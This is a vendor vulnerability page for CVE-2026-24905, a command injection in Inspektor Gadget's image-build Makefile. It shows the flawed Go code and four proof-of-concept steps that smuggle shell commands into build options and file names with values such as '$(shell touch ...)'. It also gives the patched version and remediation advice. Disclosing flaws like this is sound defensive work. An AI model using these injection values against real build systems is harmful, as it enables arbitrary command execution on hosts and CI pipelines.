Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐹 Go
Not in CISA KEV

CVE-2026-24905 inspektor-gadget

Fix: inspektor-gadget/inspektor-gadget@7c83ad8

CVE-2026-24905 is a CWE-77 vulnerability in github.com/inspektor-gadget/inspektor-gadget. A fix is available for github.com/inspektor-gadget/inspektor-gadget — see the affected versions and patch details below.

Inspektor Gadget has a Command Injection vulnerability in Makefile.build

Also known asGHSA-79qw-g77v-2vfhGO-2026-5211
Published
Jan 29, 2026
Updated
Aug 12, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Sep 21, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

No confirmed exploitation observed yet

  • A successful exploit gives an attacker total control of the affected component, not partial access.
  • CISA’s own triage has not observed active exploitation or public proof-of-concept code for this CVE as of its last assessment.

Exploitation and automatability from CISA’s SSVC triage for CVE-2026-24905.

EPSS Exploitation Probability

via FIRST.org ↗
1.3%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs69th percentile — riskier than 69% of all scored CVEsHighest risk

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Real-World Exposure

1 pkg affected
🐹github.com/inspektor-gadget/inspektor-gadget

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Impacted Resources

inspektor-gadget/cmd/common/image/build.go inspektor-gadget/cmd/common/image/helpers/Makefile.build

Description

The ig binary provides a subcommand for image building, used to generate custom gadget OCI images.

A part of this functionality is implemented in the file inspektor-gadget/cmd/common/image/build.go.

The following is the code responsible to construct the build command:

func buildCmd(options buildOptions) []string {
	cmd := []string{
		"make", "-f", filepath.Join(options.outputDir, "Makefile.build"),
		"-j", fmt.Sprintf("%d", runtime.NumCPU()),
		"OUTPUTDIR=" + options.outputDir,
		"CFLAGS=" + options.cFlags,
		"FORCE_COLORS=" + options.forceColorsFlag,
	}

	if options.ebpfSourcePath != "" {
		cmd = append(cmd, "EBPFSOURCE="+options.ebpfSourcePath, "ebpf")
	}
	if options.wasmSourcePath != "" {
		cmd = append(cmd, "WASM="+options.wasmSourcePath, "wasm")
	}
	if options.btfgen {
		cmd = append(cmd, "BTFHUB_ARCHIVE="+options.btfHubArchivePath, "btfgen")
	}

	return cmd
}

The Makefile.build file is the Makefile template employed during the building process.

This file includes user-controlled data in an unsafe fashion, specifically some parameters are embedded without an adequate escaping in the commands inside the Makefile.

This implementation is vulnerable to command injection: an attacker able to control values in the buildOptions structure would be able to execute arbitrary commands during the building process.

Impact

An attacker able to exploit this vulnerability would be able to execute arbitray command:

  • on the Linux host where the ig command is launched, if images are built with the --local flag
  • on the build container invoked by ig, if the --local flag is not provided

Attack Complexity

The buildOptions structure is extracted from the YAML gadget manifest passed to the ig image build command. Therefore, the attacker would need a way to control either the full build.yml file passed to the ig image build command, or one of its options.

Typically, this could happen in a CI/CD scenario that builds untrusted gadgets to verify correctness.

PoC

PoC 1 (Vector: cflags)

  1. Create the file build.yaml with the following content:
ebpfsource: "program.bpf.c"  
metadata: "gadget.yaml"  
cflags: " ; touch poc1.txt ; "
  1. Create the file gadget.yaml with the following content:
name: test  
description: test gadget  
  1. Create the file program.bpf.c with the following content:
#include <gadget/gadget.h>  
char LICENSE[] SEC("license") = "GPL";
  1. In the same directory where the files are run the command:
ig image build . -t test:latest
  1. Notice that the file poc1.txt gets created inside the directory.

PoC2 (Vector: ebpfsource, wasm)

  1. Create the file build.yaml with the following content:
ebpfsource: "$(shell touch poc2-1.txt)"
wasm: "$(shell touch poc2-2.txt)"
  1. Create the file $(shell touch poc2-1.txt):
touch '$(shell touch poc2-1.txt)'
  1. In the same directory where the files are run the command:
ig image build .
  1. Notice that the files poc2-1.txt and poc2-2.txt get created inside the directory.

PoC3 (Vector: -o, --output)

  1. Create the file build.yaml with the following content:
wasm: dummy.go
  1. Create the file gadget.yaml with the following content:
name: test
  1. Create the directory $(shell touch poc3.txt):
touch '$(shell touch poc3.txt)'
  1. Retrieve the full path of the created directory:
readlink -f '$(shell touch poc3.txt)'
  1. In the same directory where the files are run the command replacing the <PATH> placeholder with the value retrieved at step 4:
ig image build . --local -o '<PATH>'
  1. Notice that the file poc3.txt gets created inside the directory.

PoC4 (Vector: --btfhub-archive)

  1. Create the file build.yaml with the following content:
ebpfsource: test.c
  1. Create the file test.c:
touch test.c
  1. In the same directory where the files are run the command
sudo ig image build . --local --btfgen --btfhub-archive $(pwd)/'$(shell touch poc4.txt)'
  1. Notice that the file poc4.txt gets created inside the directory.

Suggested Remediation

Sanitize build options by providing a robust whitelist to filter on. Alternatively, revisit the design of image building to prevent shell substitution.

References

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐹Gogithub.com/inspektor-gadget/inspektor-gadgetall versions0.51.1go get github.com/inspektor-gadget/inspektor-gadget@v0.51.1

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/inspektor-gadget/inspektor-gadget, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update github.com/inspektor-gadget/inspektor-gadget to 0.51.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-24905 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like CVE-2026-24905 can be triaged on real exposure rather than presence alone.

Tailored to CVE-2026-24905. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Impacted Resources `inspektor-gadget/cmd/common/image/build.go` `inspektor-gadget/cmd/common/image/helpers/Makefile.build` ### Description The `ig` binary provides a subcommand for image building, used to generate custom gadget OCI images. A part of this functionality is implemented in the file `inspektor-gadget/cmd/common/image/build.go`. The following is the code responsible to construct the build command: ```go func buildCmd(options buildOptions) []string { cmd := []string{ "make", "-f", filepath.Join(options.outputDir, "Makefile.build"), "-j", fmt.Sprintf("%d", runtime.NumCPU
O3 Security · Impact-Aware SCA

Is CVE-2026-24905 in your dependencies?

O3 Security finds CVE-2026-24905 across Go dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.

CVE-2026-24905: inspektor | O3 Security